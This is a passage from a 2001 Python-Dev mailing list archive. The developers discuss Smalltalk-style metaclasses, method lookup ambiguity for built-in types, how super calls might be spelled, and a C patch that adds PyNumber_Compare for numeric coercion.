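As in Jim's description, the class-side method is found through the class object's own class, so myRect.newFromPointToPoint does not exist. Unlike Smalltalk-80, Python does not create a parallel metaclass for each class automatically.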

So the bottom line is (I think) that the Smalltalk method lookup mechanism
doesn't have to resolve an ambiguity because all methods that get invoked
on an object always come from the object's definition class (or superclass)
and from no other place.

Hope this helps,

Jim


From guido at digicool.com  Wed May  2 03:29:28 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:29:28 -0500
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200."
             <3AEF2903.79308F55@lemburg.com> 
References: <3AEF2903.79308F55@lemburg.com> 
Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>

> I just received a bug report for mx.Number which revealed a
> problem with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> which knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().
> 
> Was this part of the coercion patch left out on purpose or
> a simple oversight ? I hope the latter... 

Hard to say.  I don't think I paid very close attention to your patch;
Neil did, but I changed a lot of the code around coercions and
comparisons in order to implement rich comparisons.  So, several
things may have happened: Neil lost it; Neil decided against it; or I
ripped it out.

Can you elucidate me regarding the issues?  (If there's code, please
quote it or link to a specific patch.)  Since the concept of "number"
is ill-defined at best, when exactly should PyNumber_Compare() be
called?  What is it supposed to do?  Does it need a rich cousin?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Wed May  2 02:42:15 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 1 May 2001 17:42:15 -0700
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com>
Message-ID: <20010501174215.A9565@glacier.fnational.com>

[MAL]
> I just received a bug report for mx.Number which revealed a
> problem with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> which knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().

I remember the API.  I don't remember what happened to it.  Guido
might have dropped it or I might have taken it out thinking the
comparison issues would be sorted out by Guido.

Why is a new API needed?  Why can't PyObject_Compare() do the
right thing (ie. not coerce new style numbers)?

  Neil


From guido at digicool.com  Wed May  2 03:55:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:55:59 -0500
Subject: [Python-Dev] Slight wart in __all__
In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000."
             <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com> 
Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com>

> Would it make sense to explicitly raise a more meaningful exception here
> if __all__ doesn't contain strings?

Definitely.  Be my guest.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Wed May  2 03:22:47 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 13:22:47 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>

Guido:

> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

Yeek! I think that's far too confusing a rule. I suppose
it might do in the meantime, but we'd better have a long
term solution in mind before going too far down this
route.

Ultimately it seems like we'll have to introduce a separate
namespace for methods and default instance attributes,
say __classdict__. Then lookup of x.foo would look
first in x.__dict__, then x.__class__.__classdict__,
etc up the inheritance chain.

Then we'll have to resolve the ambiguity of the class.foo
syntax. The bravest way would be simply to change the syntax
for getting unbound methods.

The most common use for these seems to be for calling
inherited methods, so perhaps something like

   inherited MyBaseClass.foo(arg, ...)

which would be equivalent to

   getmethod(MyBaseClass, 'foo')(self, arg, ...)

where getmethod() is a new builtin like getattr()
except that it looks in the __classdict__, and 'self'
is really whatever the first argument of the containing
method was.
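A rough Python sketch of what getmethod() might do, assuming each class's own namespace (vars(klass), i.e. its __dict__) stands in for the proposed __classdict__ and that the search follows the class's method resolution order. getmethod() is hypothetical, not an existing builtin, and the sketch uses Python 3.

```python
def getmethod(cls, name):
    """Hypothetical: find name in the class namespaces along cls's MRO only.

    Unlike getattr(cls, name), this never consults the metaclass, so it
    cannot pick up an attribute that describes the class object itself.
    """
    for klass in cls.__mro__:
        namespace = vars(klass)  # stand-in for the proposed __classdict__
        if name in namespace:
            return namespace[name]
    raise AttributeError(f"{cls.__name__!r} defines no method {name!r}")


class MyBaseClass:
    def foo(self, arg):
        return f"MyBaseClass.foo({arg})"


class Derived(MyBaseClass):
    def foo(self, arg):
        # Spelled-out form of the proposed: inherited MyBaseClass.foo(arg)
        return "Derived + " + getmethod(MyBaseClass, "foo")(self, arg)


print(Derived().foo(42))                    # Derived + MyBaseClass.foo(42)
print(getmethod(dict, "__repr__")({1: 2}))  # {1: 2}, the dict method, not type's
```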

Now that we have __future__, would such a change be
contemplatable? Or is it too radical to even think
about?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Wed May  2 04:48:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 21:48:43 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200."
             <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

Greg Ewing:

> Yeek! I think that's far too confusing a rule. I suppose
> it might do in the meantime, but we'd better have a long
> term solution in mind before going too far down this
> route.

I agree 100%.  I had to do something quick to be able to make progress
with my PEP 252 project, but it's a clear indication that there's a
problem!

> Ultimately it seems like we'll have to introduce a separate
> namespace for methods and default instance attributes,
> say __classdict__. Then lookup of x.foo would look
> first in x.__dict__, then x.__class__.__classdict__,
> etc up the inheritance chain.

Except that sometimes you really do want x.__class__.__classdict__ to
have priority (e.g. for "guarded" attributes).
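Guido does not define "guarded" attributes here. One plausible reading, sketched with the property mechanism of present-day Python (an assumption about what he means), is a class-level attribute that must win over an entry in the instance dict. The Account class is made up for illustration.

```python
class Account:
    def __init__(self, amount):
        self._balance = amount

    @property
    def balance(self):
        """Read-only, class-level "guarded" attribute."""
        return self._balance


acct = Account(10)
acct.__dict__["balance"] = 999  # plant a competing entry in the instance dict
print(acct.balance)             # 10: the class-level property takes priority
```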

> Then we'll have to resolve the ambiguity of the class.foo
> syntax. The bravest way would be simply to change the syntax
> for getting unbound methods.

Agreed again.

> The most common use for these seems to be for calling
> inherited methods, so perhaps something like
> 
>    inherited MyBaseClass.foo(arg, ...)
> 
> which would be equivalent to
> 
>    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> 
> where getmethod() is a new builtin like getattr()
> except that it looks in the __classdict__, and 'self'
> is really whatever the first argument of the containing
> method was.

The second most common use is to reference class variables
(e.g. imagine a class that keeps counters of how many instances have
been created and deleted in C.initcount and C.delcount).  But these
should not have to change, since they really are class attributes.
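A small sketch of the counter idiom mentioned above; the class C and its counters come from the example, while the method bodies are an assumption.

```python
class C:
    initcount = 0  # class attributes: one copy shared by all instances
    delcount = 0

    def __init__(self):
        C.initcount += 1

    def __del__(self):
        C.delcount += 1


a = C()
b = C()
del a  # in CPython the refcount drops to zero and __del__ runs right away
print(C.initcount, C.delcount)  # 2 1
```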

> Now that we have __future__, would such a change be contemplatable?
> Or is it too radical to even think about?

If we can find a way to spell "super.method", we should be ready for
the future.  I can't think of something right off the bat
unfortunately.

But the issue of backwards compatibility is a big one here: the idioms
for calling base class methods and using class variables as defaults
for instance variables are so common that we will have to support
these for many future versions!  (Two things I am not looking forward
to: fixing all the Zope code that uses this, and telling the author of
Programming Python, 2nd. ed.)
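The two idioms in question, sketched in Python (the class names are made up for illustration):

```python
class Base:
    color = "red"  # class variable used as a default for instances

    def greet(self):
        return "Base.greet"


class Derived(Base):
    def greet(self):
        # Idiom 1: call the base-class method through the class object.
        return "Derived/" + Base.greet(self)


d = Derived()
print(d.greet())               # Derived/Base.greet
print(d.color)                 # red: idiom 2, the class variable is the default
d.color = "blue"               # assignment creates an instance variable
print(d.color, Derived.color)  # blue red
```

Any change to how class.foo resolves has to keep both Base.greet(self) and the class-variable default working.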

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Wed May  2 04:48:20 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 14:48:20 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>

Guido:

> Except that sometimes you really do want x.__class__.__classdict__ to
> have priority (e.g. for "guarded" attributes).

What's a "guarded" attribute?

> But the issue of backwards compatibility is a big one here

I was thinking that, while this is still in the __future__,
the __dict__ attribute would be a pseudo-dict that, by
default, behaves like the union of the old __dict__ and
the __classdict__.
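One way to picture such a pseudo-dict in today's Python is collections.ChainMap. The sketch assumes that lookups consult the instance dict before the class dict and that writes go to the instance dict only; Greg's message does not specify the write semantics.

```python
from collections import ChainMap

instance_dict = {"x": 1}
classdict = {"x": 0, "y": 2}  # stand-in for the proposed __classdict__

# Reads search instance_dict first, then classdict;
# writes and deletions affect only the first mapping, instance_dict.
compat_dict = ChainMap(instance_dict, classdict)

print(compat_dict["x"], compat_dict["y"])  # 1 2
compat_dict["y"] = 5                       # shadows, does not overwrite, classdict
print(instance_dict, classdict)            # {'x': 1, 'y': 5} {'x': 0, 'y': 2}
```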

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From mal at lemburg.com  Wed May  2 09:59:03 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 09:59:03 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com>
Message-ID: <3AEFBE47.A847C5D2@lemburg.com>

Neil Schemenauer wrote:
> 
> [MAL]
> > I just received a bug report for mx.Number which revealed a
> > problem with the comparison code in Python 2.1. Looking at
> > the code it seems that one of my original coercion patches
> > did not make it into the core. I added a new API PyNumber_Compare()
> > which knows about the new coercion mechanism and should be called for
> > numbers instead of trying coercion in PyObject_Compare().
> 
> I remember the API.  I don't remember what happened to it.  Guido
> might have dropped it or I might have taken it out thinking the
> comparison issues would be sorted out by Guido.

Good; so there's a chance for getting it back in :-)
 
> Why is a new API needed?  Why can't PyObject_Compare() do the
> right thing (ie. not coerce new style numbers)?

I think the reason for implementing number compares as separate
API was to simply shift out code from PyObject_Compare() into
a new function, not so much motivated by some higher level need
to do number compares.

[Guido]
> > Was this part of the coercion patch left out on purpose or
> > a simple oversight ? I hope the latter... 
> 
> Hard to say.  I don't think I paid very close attention to your patch;
> Neil did, but I changed a lot of the code around coercions and
> comparisons in order to implement rich comparisons.  So, several
> things may have happened: Neil lost it; Neil decided against it; or I
> ripped it out.
> 
> Can you elucidate me regarding the issues?  (If there's code, please
> quote it or link to a specific patch.)  Since the concept of "number"
> is ill-defined at best, when exactly should PyNumber_Compare() be
> called?  What is it supposed to do?  Does it need a rich cousin?

The reasoning is simple: the coercion patches basically pass
control over coercion down to the APIs in question and thus provide
the type with more information to choose from.

This is currently implemented in 2.1 for all number methods,
but not for number comparisons which do have the same problems
with centralized coercion as e.g. __add__ or other binary
operators.

Here's part of the original patch:

--- Include/orig/abstract.h	Wed May 13 00:28:58 1998
+++ Include/abstract.h	Thu May 21 12:31:55 1998
@@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 	 This function always succeeds.
 
        */
 
-     PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
+     PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2));
+
+       /*
+	 Returns the result of comparing o1 and o2, or null on failure.
+	 This is the equivalent of the Python expression: cmp(o1,o2).
+       */
+
+      PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
 
        /*
 	 Returns the result of adding o1 and o2, or null on failure.
 	 This is the equivalent of the Python expression: o1+o2.
 
[...]

 }
 
+/* Emulate old method for comparing numeric types using coercion and
+   tp_compare. If coercion doesn't work, we use the type names as
+   comparison basis (like PyObject_Compare() does too). */
+
+static PyObject *
+_PyNumber_OldstyleCompare(PyObject *v, 
+			  PyObject *w)
+{
+    int err;
+
+    DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n",
+	    v->ob_type->tp_name,(long)v,
+	    w->ob_type->tp_name,(long)w);
+    err = PyNumber_CoerceEx(&v, &w);
+    if (err < 0)
+	    return NULL;
+    else if (err == 0 && v->ob_type->tp_compare) {
+	    int cmp;
+	    
+	    cmp = (*v->ob_type->tp_compare)(v, w);
+	    /* XXX Test for errors ? Looks like C types cannot raise
+	       exceptions in the compare slot... */
+	    Py_DECREF(v);
+	    Py_DECREF(w);
+	    DPRINTF(" compare slot returned: %i",cmp);
+	    return PyInt_FromLong(cmp);
+    }
+    DPRINTF(" using type names for comparison\n");
+    return PyInt_FromLong(strcmp(v->ob_type->tp_name, 
+				 w->ob_type->tp_name));
+}
+
+PyObject *
+PyNumber_Compare(v, w)
+	PyObject *v, *w;
+{
+	DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n",
+		v->ob_type->tp_name,(long)v,
+		w->ob_type->tp_name,(long)w);
+	BINOP("__cmp__", "__rcmp__", PyNumber_Compare);
+	return _PyNumber_BinaryOperation(v,w,
+					 NB_SLOT(nb_cmp),
+					 "cmp()");
+}
+

[...]

+static PyObject *
+_PyNumber_BinaryOperation(PyObject *v,
+			  PyObject *w,
+			  const int op_slot,
+			  const char *operation)
+{
+	PyNumberMethods *mv, *mw;
+	register PyObject *x;
+	register binaryfunc *slot;
+	int c;
...
+	/* When using old coercion, make sure that the requested slot
+	   is available on old style numbers or use an emulation. */
+	if (op_slot > NB_SLOT(nb_hex)) {
+
+	    /* Emulation hooks: */
+	    if (op_slot == NB_SLOT(nb_cmp))
+		return _PyNumber_OldstyleCompare(v,w);
+
+	    goto badOperands;
+	}


[...]

 int
 PyObject_Compare(v, w)
 	PyObject *v, *w;
 {
 	PyTypeObject *tp;
@@ -291,27 +294,30 @@ PyObject_Compare(v, w)
 			Py_DECREF(res);
 			PyErr_SetString(PyExc_TypeError,
 					"comparison did not return an int");
 			return -1;
 		}
-		c = PyInt_AsLong(res);
+		c = PyInt_AS_LONG(res);
 		Py_DECREF(res);
 		return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 	}
 	if ((tp = v->ob_type) != w->ob_type) {
-		if (tp->tp_as_number != NULL &&
-				w->ob_type->tp_as_number != NULL) {
-			int err;
-			err = PyNumber_CoerceEx(&v, &w);
-			if (err < 0)
+		if (tp->tp_as_number != NULL ||
+		    w->ob_type->tp_as_number != NULL) {
+			PyObject *res;
+			int c;
+			res = PyNumber_Compare(v,w);
+			if (res == NULL)
 				return -1;
-			else if (err == 0) {
-				int cmp = (*v->ob_type->tp_compare)(v, w);
-				Py_DECREF(v);
-				Py_DECREF(w);
-				return cmp;
+			if (!PyInt_Check(res)) {
+			    PyErr_SetString(PyExc_TypeError,
+					"comparison did not return an int");
+			    return -1;
 			}
+			c = PyInt_AS_LONG(res);
+			Py_DECREF(res);
+			return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 		}
 		return strcmp(tp->tp_name, w->ob_type->tp_name);
 	}
 	if (tp->tp_compare == NULL)
 		return (v < w) ? -1 : 1;
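The dispatch order in the patch excerpt above can be modelled in a few lines of Python, as a rough illustration only. The nb_cmp hook name mirrors the C slot, but number_compare(), Money and the coerce callback are hypothetical. The sketch also leaves out the __cmp__/__rcmp__ step for class instances and everything the C code does about reference counts and errors.

```python
def number_compare(v, w, coerce):
    """Toy model of the patch's PyNumber_Compare() dispatch (hypothetical names).

    A number type may define nb_cmp(v, w): it sees both operands in their
    original order and returns -1, 0 or 1, or NotImplemented to decline.
    coerce(v, w) returns a pair of comparable values, or None on failure.
    """
    # 1. New-style numbers: let v's type, then w's type, decide.
    for operand_type in dict.fromkeys((type(v), type(w))):
        hook = getattr(operand_type, "nb_cmp", None)
        if hook is not None:
            result = hook(v, w)
            if result is not NotImplemented:
                return result
    # 2. Old-style numbers: coerce to a common type, then compare.
    pair = coerce(v, w)
    if pair is not None:
        a, b = pair
        return (a > b) - (a < b)
    # 3. Last resort, as PyObject_Compare() does: compare the type names.
    ta, tb = type(v).__name__, type(w).__name__
    return (ta > tb) - (ta < tb)


class Money:
    """Hypothetical new-style number that can compare itself with ints."""

    def __init__(self, cents):
        self.cents = cents

    @staticmethod
    def nb_cmp(v, w):
        def to_cents(x):
            if isinstance(x, Money):
                return x.cents
            if isinstance(x, int):
                return x * 100
            return None

        a, b = to_cents(v), to_cents(w)
        if a is None or b is None:
            return NotImplemented
        return (a > b) - (a < b)


def no_coercion(v, w):
    return None


print(number_compare(Money(250), 2, no_coercion))  # 1
print(number_compare(3, Money(250), no_coercion))  # 1
```

The point of the design is visible in the second call: the int on the left knows nothing about Money, yet Money still gets to decide the comparison before any central coercion happens.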


-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May  2 11:09:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 11:09:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <3AEFCEBD.2E5979C9@lemburg.com>

Guido van Rossum wrote:
> 
> While implementing more class-like behavior for built-in types in the
> experimental descr-branch in the 2.2 CVS tree, I've noticed problems
> caused by Python's collapsing of class attributes and instance
> attributes.
> 
> For example, suppose d is a dictionary.  My experimental changes make
> d.__class__ return DictType (from the types module).
> (DictType.__class__ is TypeType, by the way.)  I also added special
> methods.  For example, d.__repr__() now returns repr(d).  I am
> preparing for subclassing of built-in types, so I will eventually be
> able to derive a class MyDictType from DictType, as follows:
> 
> class MyDictType(DictType):
>   ...
> 
> Now comes the fun part.  Suppose MyDictType wants to define its own
> repr():
> 
> class MyDictType(DictType):
>   def __repr__(self):
>     return "MyDictType(%s)" % DictType.__repr__(self)
> 
> But, (surprise, surprise!), DictType itself also has a __repr__()
> method: it returns the string "<type 'dictionary'>".
> 
> So the above code would fail: DictType.__repr__() returns
> repr(DictType), and DictType.__repr__(self) raises an argument count
> error.  The correct __repr__ method for dictionary objects can be
> found as DictType.__dict__['__repr__'], but that looks hideous!
> 
> What to do?  Pragmatically, I can make DictType.__repr__ return
> DictType.__dict__['__repr__'], and all will be well in this example.
> But we have to tread carefully here: DictType.__class__ is TypeType,
> but DictType.__dict__['__class__'] is a descriptor for the __class__
> attribute on dictionary objects.
> 
> The best rule I can think of so far is that DictType.__dict__ gives
> the *true* set of attribute descriptors for dictionary objects, and is
> thus similar to Smalltalk's class.methodDict that Jim describes
> below.  DictType.foo is a shortcut that can resolve to either
> DictType.__dict__['foo'] or to an attribute (maybe a method) of
> DictType described in TypeType.__dict__['foo'], whichever is defined.
> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

I'm not sure I can follow you here: DictType.__repr__ is the
representation method of the dictionary and not inherited
from TypeType, so there should be no problem.

The problem with the misleading error message would only show
up in case DictType does not define a __repr__ method. Then the
inherited one from TypeType would come into play and cause
the problem you mention above.

Thinking in terms of meta-classes, I believe we should implement
this mechanism in the meta-class (TypeType in this case). Its
__getattr__() will have to decide whether or not to expose its
own methods and attributes.

The only catch here is that currently instances and classes have 
control of whether and how to bind found functions as methods or not. 
We should probably change that to pass complete control over to the 
meta-class object and remove the special control flows currently found
in instance_getattr2() and class_lookup().

In general, I think that meta-classes should not expose their
attributes to the class objects they create, since this causes
way too many problems.

Perhaps I'm oversimplifying things here, but I have a feeling that
we can go a long way by actually trying to see meta-classes as 
first class members in the interpreter design and moving all the 
binding and lookup mechanisms over to this object type. The special 
casing should then take place in the meta-class rather than its 
creations.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 12:57:42 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 12:57:42 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>  <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>

> > The most common use for these seems to be for calling
> > inherited methods, so perhaps something like
> > 
> >    inherited MyBaseClass.foo(arg, ...)
> > 
> > which would be equivalent to
> > 
> >    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> > 
> > where getmethod() is a new builtin like getattr()
> > except that it looks in the __classdict__, and 'self'
> > is really whatever the first argument of the containing
> > method was.
> 
> The second most common use is to reference class variables
> (e.g. imagine a class that keeps counters of how many instances have
> been created and deleted in C.initcount and C.delcount).  But these
> should not have to change, since they really are class attributes.
> 
> > Now that we have __future__, would such a change be contemplatable?
> > Or is it too radical to even think about?
> 
> If we can find a way to spell "super.method", we should be ready for
> the future.  I can't think of something right off the bat
> unfortunately.

Could we make

  super(self, MyBaseClass).foo(arg, ...)

behave similar to

  MyBaseClass.foo(self, arg, ...)

Wrapping this stuff in a function would probably also
make it possible to use the same pattern in existing Python versions.

Thomas


From thomas.heller at ion-tof.com  Wed May  2 13:12:21 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 13:12:21 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>

> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
> how metaclasses work in Smalltalk.  He should know, since he invented
> them! :-)  I include it below, with his permission.

I found this very interesting reading.

[From Jim Althoff]
> In the list below, indentation indicates class hierarchy (superclass --
> subclass)
The indentation, unfortunately, seems to be destroyed.

> 
> plain-class
> ----------------
> <none>
> o Class
>    o  Object                                                   isInstanceOf
> o ObjectMetaClass                     isInstanceOf  MetaClass
>         o Class                                                isInstanceOf
> o ClassMetaClass                    isInstanceOf  MetaClass
>             o MetaClass                                  isInstanceOf
> o MetaClassMetaClass      isInstanceOf  MetaClass
>         . . .
>         o Rectangle                                        isInstanceOf
> o RectangleMetaClass          isInstanceOf  MetaClass
>             o SpecializedRectangle            isInstanceOf
> o SpecializedRectangleMetaClass  isInstanceOf  MetaClass

A question for Jim (this is more Smalltalk than Python related):
How does the Behaviour class fit into this picture?

Thomas


From guido at digicool.com  Wed May  2 14:15:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 07:15:57 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200."
             <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com>  
            <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> 
Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>

> > If we can find a way to spell "super.method", we should be ready for
> > the future.  I can't think of something right off the bat
> > unfortunately.
> 
> Could we make
> 
>   super(self, MyBaseClass).foo(arg, ...)
> 
> behave similar to
> 
>   MyBaseClass.foo(self, arg, ...)
> 
> Wrapping this stuff in a function would probably also
> make it possible to use the same pattern in existing Python versions.

Yes, I can see how to write super() using current tools (or 1.5.2
even).  The problem is that this makes super calls even more wordy
than they already are!  I can't think of anything that wouldn't
require compiler support though.
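Thomas's explicit form can indeed be written without compiler support. A minimal Python 3 sketch, under stated assumptions: the helper name `explicit_super` and its `(obj, base)` argument order are hypothetical (they follow Thomas's spelling), and the search is the classic depth-first, left-to-right walk of `base` and its bases.

```python
def _classic_lookup(klass, name):
    """Search klass, then its bases depth-first, left to right."""
    if name in vars(klass):
        return vars(klass)[name]
    for base in klass.__bases__:
        try:
            return _classic_lookup(base, name)
        except AttributeError:
            pass
    raise AttributeError(name)


class explicit_super:
    """Hypothetical helper, not an existing API:
    explicit_super(obj, Base).foo(*args) behaves like Base.foo(obj, *args)."""

    def __init__(self, obj, base):
        self._obj = obj
        self._base = base

    def __getattr__(self, name):
        attr = _classic_lookup(self._base, name)
        # Bind functions (and other descriptors) to the wrapped object.
        getter = getattr(type(attr), "__get__", None)
        if getter is None:
            return attr            # plain class variable: return as-is
        return getter(attr, self._obj, type(self._obj))


class Base:
    def foo(self, arg):
        return "Base.foo(%r)" % (arg,)


class Derived(Base):
    def foo(self, arg):
        return "Derived+" + explicit_super(self, Base).foo(arg)


print(Derived().foo(1))   # Derived+Base.foo(1)
```

The call site is no shorter than `Base.foo(self, arg)`, which is exactly the wordiness objection raised above.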

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward at python.net  Wed May  2 14:57:41 2001
From: gward at python.net (Greg Ward)
Date: Wed, 2 May 2001 08:57:41 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
Message-ID: <20010502085741.B515@gerg.ca>

On 02 May 2001, Guido van Rossum said:
> Yes, I can see how to write super() using current tools (or 1.5.2
> even).  The problem is that this makes super calls even more wordy
> than they already are!  I can't think of anything that wouldn't
> require compiler support though.

I was just doing some gedanken with various ways to spell "super", and I
think my favourite is the same as Java's (as I remember it):

class MyClass (BaseClass):
    def foo (self, arg1, arg2):
         super.foo(arg1, arg2)


Since I don't know much about Python's guts, I can't say how
implementable this is, but I like the spelling.  The semantics would be
something like this (with adjustments to the reality of Python's guts):

  * 'super' is a magic object that only makes sense inside a 'def'
    inside a 'class' (at least for now; perhaps it could be generalized
    to work at class scope as well as method scope, but let's keep
    it simple)

  * super's notional __getattr__() does something like this:
    - peek at the calling stack frame and fetch the calling function
      (MyClass.foo) and the first argument to that function (self)
    - [is this possible?] ensure that calling_function is a bound
      method, and that it's bound to the self object we just plucked
      from the stack; raise a "misuse of super object" exception if not
    - walk the superclass tree starting at self.__class__.__bases__
      (ie. skip self's class), looking for an object with the name
      passed to this __getattr__() call -- 'foo'
    - when found, return it
    - if not found, raise AttributeError

The ability to peek at the calling stack frame is essential to this
scheme, in order to fetch the "current object" (self) without needing to
have it explicitly passed.  Is this as bothersome from C as it is from
Python?
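Peeking at the caller is possible from Python too. A minimal sketch of the magic object described above, under assumptions that are not part of the proposal: it relies on CPython's `sys._getframe` (an implementation detail), takes the method's first parameter to be the instance, and walks Python 3's `__mro__` instead of the depth-first walk of `__bases__`. The names `magic_super` and `_MagicSuper` are hypothetical.

```python
import sys


def _bind(attr, obj):
    """Bind functions (and other descriptors) to obj; return data as-is."""
    getter = getattr(type(attr), "__get__", None)
    return attr if getter is None else getter(attr, obj, type(obj))


class _MagicSuper:
    """Hypothetical sketch of a 'super' object that finds self by
    inspecting the calling frame."""

    def __getattr__(self, name):
        frame = sys._getframe(1)              # frame of the method using super
        code = frame.f_code
        if code.co_argcount == 0:
            raise TypeError("misuse of super object")
        obj = frame.f_locals[code.co_varnames[0]]   # first argument: self
        mro = type(obj).__mro__
        # The frame knows only its code object, so find the class whose
        # own dict holds a function with this code object...
        for i, klass in enumerate(mro):
            if any(getattr(v, "__code__", None) is code
                   for v in vars(klass).values()):
                # ...and resume the search *after* that class.
                for base in mro[i + 1:]:
                    if name in vars(base):
                        return _bind(vars(base)[name], obj)
                raise AttributeError(name)
        raise TypeError("misuse of super object")


magic_super = _MagicSuper()


class A:
    def foo(self, x):
        return ["A", x]


class B(A):
    def foo(self, x):
        return ["B"] + magic_super.foo(x)


class C(B):
    def foo(self, x):
        return ["C"] + magic_super.foo(x)


print(C().foo(1))   # ['C', 'B', 'A', 1]
```

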